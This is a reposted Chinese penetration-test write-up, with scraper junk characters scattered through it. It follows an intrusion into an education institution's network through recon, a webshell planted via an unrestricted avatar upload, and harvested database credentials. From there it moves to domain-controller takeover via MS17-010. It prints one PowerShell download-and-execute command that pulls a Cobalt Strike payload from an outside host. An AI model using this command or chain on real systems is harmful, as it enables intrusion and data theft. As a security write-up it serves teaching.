|
1 N5 N \, K& A+ |, C% e 这次渗透是一个从0到1,从外网到拿下域控的实战过程,希望可以给大家一些思路
- u$ r8 F& g: w1 j# T6 [: B 1 J! U$ \& p; S" f# s4 H( _* M, E
6 P/ i, q% y& V# v4 P
' M/ q, [4 N0 ^) z/ D ! Z. x' d6 J1 o' w2 S5 Q+ P# ~0 F# h
9 V, e. Y/ y9 `; S 正文
6 m$ M; P& G8 ^2 }+ c$ i7 o + Q$ P3 }! m$ J! T! U9 q3 p- d
7 h6 d2 j; @5 |. Z! d, ` 0 i6 `% j! K1 c: N4 J M& |
2 e3 T- | t5 b+ G5 L
* x. L7 \ d% H$ { 目标:www.xxxx.com(一家教育机构)
( r6 M2 I) {; O9 \! d打开是一个登录框,只能是手机号+密码或者手机号+验证码且并未开放注册功能
- y6 [0 [7 R3 O! V* B: e, w / l$ X) J, J. I/ j
3 a @* R7 U: ?8 E+ w! s
0 |6 f' E, t k7 R4 l
/ E1 L3 U3 y- v& g- A3 _6 g1 K. ?! L. \' J
进行了简单的信息搜集 - F$ I) `$ d; N+ N3 t/ o
1 Y6 D- R7 N& E- Z) ]( \* s0 L
' k: _+ Y0 K3 s/ s5 X; s9 l 5 r3 S' d7 e# E- m$ H9 E" I
9 p; M% N r& M- V' r6 Q 子域名搜集
9 U2 Y. C" _! Y7 U
" |6 y& W! e: g+ c; q# \2 z" b# x! C
. j$ K4 \5 z8 y- P7 K# i' y
" | X$ p8 M7 ~1 h/ s * `. h& V( k. A" c1 q2 E( r$ `
% T- Z5 ^# B* v( z fofa找资产 4 V3 H3 L4 l) k
. N" _& u7 f9 F; t' {+ K
+ t! X$ }0 X. A4 Y/ r
. T* W) @& c4 g2 y# h0 W
p6 D- w4 t. t0 V8 ]) f 7 @$ g. B) G8 \! j3 f3 p) @& h
" V# E C+ W0 b9 z. N
2 k0 ^- q! d1 g/ R6 r/ D3 e 一共七个资产。去重之后只有两个。
9 X4 @- ~- m$ N 3 i4 U z5 O4 A M2 V
/ C( `7 F( {$ _% g8 R
" k% y0 q/ B0 [' _: }% B+ L( X: b1 f0 [+ ]) ?) m9 }8 P
目录探测2 r3 i% a9 z# ]# A
$ g1 D* d# m3 w8 d0 A; X: [
) c! p% h6 {* Y- K4 ]& d: G1 A
& o6 ]6 l/ R7 Q0 z9 B9 S
1 U' G( g: o4 _8 F3 `7 o2 R! J5 Y
7 Y6 d$ P* |+ @" E 我尝试了暴力枚举,看有没有弱口令之类的,然而并没有 2 X, D# X$ l) V; n# W" V
- Y2 m4 T/ I j6 Y( D. {7 ^7 W4 f/ r3 u7 D' w
' g4 _" }% n7 l* D3 y" g
! J6 ]9 L$ M+ p( G; V 我又尝试了通过修改返回包来绕过登录界面
) n) q, m# B+ t; O/ p ~
; S$ R: X" S" e5 C: g7 ^5 y6 o2 a6 t' C* J6 t& p
$ e% ~6 _. p0 P2 _" T
" t: Q1 Q; d; \9 v. z$ [2 s
! C8 r; [% E8 y( u# L( D& M 还是不行,尝试注入无果
" a& {0 U$ ^# }
: [/ B1 G4 H! k% K. N2 D' O ?0 F4 e/ Q* {$ d% ^) P
0 C, |5 L( c* a
- K; K9 P) z! m0 U4 v0 R
+ S- Z$ z) r6 G. @) G6 H 不过我目录探测出了一处Spring信息泄露 8 {- d) s! y8 Y. g) I4 c
4 F) G8 y. J& P
. V7 a1 h& l6 z$ `. B9 p( U 3 N/ E( z( |5 O0 }3 B
* i7 v8 `& i+ p0 t
* E5 s) N8 `/ M1 Z2 a6 g7 v- V ; }* }9 J5 U$ W
1 i! P0 f6 A7 d& W 尝试Spring RCE无果,想通过trace目录下替换cookie实现登录,但是发现删除了这个目录2 f% h, o. _; E3 y% b, Q1 R% M
. I# ]; e3 V- v3 r
- z- ?( l* X* |5 n . ^3 l9 _% W7 \% [
, Z- g, Z# Y7 j
+ \' Y+ E% k/ f; y+ N. @) m) L 后对公众号进行了简单的信息搜集,针对公众号搜集时,尽量找后面认证过的进行渗透。( A/ s! v+ y: c+ u0 \$ C! e5 k
' a7 a" `. a4 l Q a; }0 W5 V1 q p
0 V* ^% w7 |/ P , X* U. s! H1 K+ Y& p) h! y( R( \
0 n7 ?4 C' H3 n5 w& r* C/ a; J/ j
6 u1 I, @2 T! ~! r" b 获取有些师傅到这一步就手机抓包电脑测了。
9 G( M" R8 e" z* [) X
. ~; A- z6 R. @
; B0 z0 c. m( H9 P, s Windows新版微信可以抓取公众号和小程序的包,只需要把IE代理配置一下即可。
2 t/ _# ~5 z8 x* {1 g1 |7 E- ]0 O+ n
" @& m- _ ^5 w" \1 s1 p7 r l9 I! a6 s( k, `9 O/ e% d! K9 ?7 `' ~
其中在一个公众号发现了小程序,可以进行注册。1 \9 w5 B3 J/ [, |1 r1 S' m
+ ` O9 w3 r1 t
3 C2 F, {$ y4 u f7 C
看到了头像上传,尝试上传获取WebShell
0 L7 e; ^& K+ v, S* K; O
4 ]' k; s- l3 M: J* o5 P2 D" c; ^
4 q+ E- A4 ^ K7 K- B 8 _: S0 R0 b/ f! {% } ?' o. v
' C. Y2 z- ]$ ~. Q& u0 ~/ t
未做任何限制成功GetShell,上了冰蝎马,目录没权限访问
4 u+ |' N( u) V4 C$ d; }/ _
( I" z$ G6 w- \( p
4 y* X1 D4 w* {/ F3 G- U
; Z3 w7 R5 ~4 N- g* [' c o 8 X. }. B% p8 J3 D s& [
T* y: p& c. u2 Y
然后上了大马$ Z l' h X2 l0 W9 S% i
. t9 g: g" G% j' n# {8 _- x7 b) A4 }
- A+ ^3 L, v! G/ D. i. z
- l, Y( r' P/ G
+ `1 V; J3 ~! {. I6 J9 w$ Z
; z- w0 V7 M$ I7 ^' B7 W4 e% V5 G
- M! J$ k6 ` ]0 T 8 e; Z5 o) Y( X8 ]
" N1 ~; K) @. b/ F1 c/ j" m 通过翻找文件发现数据库账号密码4 C- d8 Y- j; E1 a
7 z& b u9 h, n/ k% U C: ~
1 J7 k1 M8 C# {* A$ } f% a
: h% S7 A7 C2 f! a6 O7 p
5 z# _) U5 Y7 Y7 [' {8 G
6 C! M' @. T n5 F --内网渗透' }$ M: Z5 } T/ r
* f/ L% a9 Z2 F
F$ V! g" V H% t6 O" u6 h R" B t
直接通过powershell执行 cs上线
3 U: N* _; d' E6 k4 }- K4 t $ k- l( C3 ?3 V. ~8 W6 c" M# h8 R
' O0 z: y B- h u) j% C m% d powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://xxxxxxxxxxxxx/a'))"
* t. k' A9 N3 m+ m$ L: c( B
$ V. r& f5 a1 _3 ?+ z( x8 I# H8 X3 k
; e/ }/ I8 v* E
9 n4 g% t0 z6 n' @" ~0 P ) R y3 F5 E. P7 S3 H# l/ J
6 F4 J3 _+ ] w; `8 i" V* \ 进入内网后,简单的进行一波信息收集,寻找域控并对服务器段进行弱口令爆破
+ w" l( M0 ^$ y5 J
# S' o. j: H# T8 P( l3 Q o7 S7 H3 H/ S7 }0 z# |& b
1 [6 N# I0 f2 f4 j' r
5 ^, A/ K. X$ J3 D& [/ v( r; d- Q
登录爆破出来的服务器,发现多网卡且存在逻辑隔离。 & a l2 W/ }4 g3 I! y4 J- n0 ^6 l
( b, m4 x S9 F+ c T) f; @3 r* B% x( V
1 a n6 K# r1 V: _- _
) {; z; D: Y1 u6 ?- y! A! V9 F
6 t/ N" ?* ~% J- h% c
- d6 {- B# g9 {( \" Q- _
+ W' A1 E i1 b* N5 L , w/ J8 w, Z0 w' G0 Z; ]
* j# D3 |" H, p/ B% D 通过跳扳机能通域控,发现域控server2008且存在ms17010,直接一把梭 . N8 W+ d( t% g" k3 g9 V
% @. Y- i+ h: z7 b( a
) y. e" {( k$ ?3 \) q
5 z2 ]0 |5 c% z% W) T" F0 `, u! ?: Y# P; J: D
- _+ R5 g% j( f5 R/ y) N \3 w& m
% a( p6 n; P$ s/ l4 v: e) [8 ^$ A6 c7 K) u# [
3 P8 M0 c0 e/ ?$ M9 g; N
# O, \. U: e: }2 |& X" L3 K
6 Z Y7 N y2 O9 n. L" P
+ A7 S* m4 x7 y0 b/ X
2 t% {' p7 K- D. }( q- @
, }4 i# h; f) q, m R3 U0 r9 J8 L, C, K% h% p" W
% h3 \9 ], B A# o, ? 小结0 H& m! m$ ]0 c* [& m) @8 J. A. o
2 S0 m; O) F7 i7 f6 y& v/ F% }2 Q; s6 O
- k1 G. l4 ]0 d- Q3 U7 u6 ^
6 S6 c7 b4 }! r) q* R$ I1 ^4 v* i, h `, Y
在渗透测试过程中,信息收集很重要,细心和耐心也是不可缺少的,总得来说,这次的渗透测试总的来说比较顺利,希望可以给大家带来一些思路!
9 R `$ U D' K% B; B2 Z6 q3 l
2 q) F k7 c8 u4 k2 T1 d2 N5 n" b/ j3 H) u* S9 X* k3 p
6 |2 M' Y- \% n; z# a ^0 w- G
1 ~3 C6 I7 v& M0 I$ n: \# Y0 _5 K$ R
-
- T8 Y9 |& h2 ~% S/ J+ }1 ]* u: U ! O: ]3 I% o I5 b5 L; ? X6 ?/ a
& }% }; P3 _* D& h& [! _2 J( t -
9 T& B3 E; x, I5 H$ D* ]2 O
$ I! `& s% f( Q9 d* H& I
: _$ @+ k7 |" Y0 X7 J& \9 B
2 `8 G1 p4 }; A" V7 R ?' Z
6 V& [5 Y; a. I* {1 Y" \9 O 作者:Xm4FDf转载自:https://bbs.ichunqiu.com/thread-57879-1-1.html/ j+ {( h7 K" R, J3 H2 D
, P& G9 j# U' Q5 q
; M# a p# ^5 q$ I) _# b & ]% A6 {8 Z( a- x) I
|